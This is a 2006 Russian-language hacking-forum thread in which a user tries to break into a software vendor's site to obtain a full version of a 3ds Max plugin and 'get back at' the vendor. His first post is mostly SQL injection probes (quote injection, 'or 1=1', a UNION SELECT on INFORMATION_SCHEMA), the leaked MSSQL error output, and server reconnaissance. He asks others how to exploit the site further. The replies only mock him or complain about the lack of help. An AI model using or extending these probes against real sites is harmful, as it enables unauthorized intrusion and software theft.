[как] MSSQL sql inj
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя  |
| Сообщение |
<< Старые топики Новые топики >> |
|
|
[как] MSSQL sql inj - 2006-05-24 02:05:33
|
|
|
ShadowX
Сообщений: 12
Оценки: 0
Присоединился: 2006-04-25 13:44:38
|
Предистория:
Хотел надыбать плагин к максу в нете через гул и яндекс да и другие поисковые системы ни чё интерного не нашёл. Решил поискать на сайте производителя кроме демо версий ничего небыло, кряка к которым я так же не нашёл. Хотелось бы полазить по сайту на предмет наличия цивильной версии кейген к которой уже имеется.
Нашёл форум где производится запрос типо :…./forum.cfm?foro=52&TID=958
———————————————-
Ввёл: …./forum.cfm?foro=52&TID=''958
Получил:
Error Diagnostic Information
ODBC Error Code = 37000 (Syntax error or access violation)
[Microsoft][ODBC SQL Server Driver][SQL Server]Line 4: Incorrect syntax near ''958''.
The error occurred while processing an element with a general identifier of (CFQUERY), occupying dосиmеnt position (79:2) to (79:48).
Date/Time: 05/23/06 17:40:44
Browser: Mozilla/4.0 (compatible; MSIE 6.0; windоws NT 5.1; en) Opera 8.50
Remote Address: XX.XX.XX.XX
Query String: foro=52&TID=%27958
————————-
далее по примеру: …./forum.cfm?foro=52&TID=958 or 1=1
Всё нормально открылся форум.
————————-
Далее: …./forum.cfm?foro=52&TID=958"
Получил:
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string '' AND Mensajes.ID_Tema = Temas.ID_Tema AND Conferencias.ID_Conf = Temas.ID_Conf ORDER BY Mensajes.Fecha''.
The error occurred while processing an element with a general identifier of (CFQUERY), occupying dосиmеnt position (79:2) to (79:48).
————————–
ввёл: ……./forum.cfm?foro=52&TID=958 UNION SELECT TOP 1 Mensajes FROM INFORMATION_SCHEMA.TABLES–
получил:
[Microsoft][ODBC SQL Server Driver][SQL Server]Incorrect syntax near the keyword ''AND''.
————————————————–
Подскажите что мне можно здесь сделать. Уж очень хочется на них отыграться.Если информации недостаточно. То распишу более подробно. Если необхадимо и адресс сервака дам.
————————————————-
З.С.: Пробовал эксплоитом KAH2 не проканало всё что узнал выдал мне спайдер
-
220 win11736 Microsoft FTP Service (Version 5.0)
-
Имя сервера : Microsoft-IIS/5.0
состояние : 200 (OK)
расположение : http://ХХ.ХХ.ХХ.ХХ/index.htm
текущие дата и время : Tue, 23 May 2006 20:45:25 GMT
время последней модификации : Fri, 29 Oct 2004 02:48:56 GMT
формат содержимого : text/html
объем данных : 2212
ETag : "dad79bd561bdc41:dca"
-
Cуществующие, но недоступные директории:
/orders/
/logs/
/imаgеs/
|
|
|
|
|
[как] MSSQL sql inj - 2006-05-24 02:30:11
|
|
|
Python
Сообщений: 4964
Оценки: 0
Присоединился: 2005-12-14 08:32:13
|
Ёп [sm=scull.gif] в "Войне и мир" и то меньше написано. [sm=scull.gif]
|
|
|
|
|
[как] MSSQL sql inj - 2006-05-26 23:58:43
|
|
|
ShadowX
Сообщений: 12
Оценки: 0
Присоединился: 2006-04-25 13:44:38
|
Ну чё кулц хакеры я не пойму тут вааще отвечают на вопросы новичков или нет?
Мож вопрос не павельно поставлен? Или изибтый совсем ну дык читал я про скул инекци пробовал по примерам но ввиду нехватки знаний зашёл в тупик. Просвятите, будете так добры один раз напримере, что можно сделать, а чего сдеать не получится.
Пишешь в топик вопрос в ответ блин напиши на мыло постучи в аську, пишешь на мыло стучиш в аську реакци ноль.
—————————————
Начинаю сомневаться в целесообразности данного раздела форума… незнаю как у остальных единственное, что я заметил - это что пишут ответы С ЧЕГО НАЧАТЬ хакеру или САМОЕ ОСНОВНОЕ…
Наверное не зря его назвали для новичков…. потому что народ не образованый пытается научится.
|
|
|
|
|
|
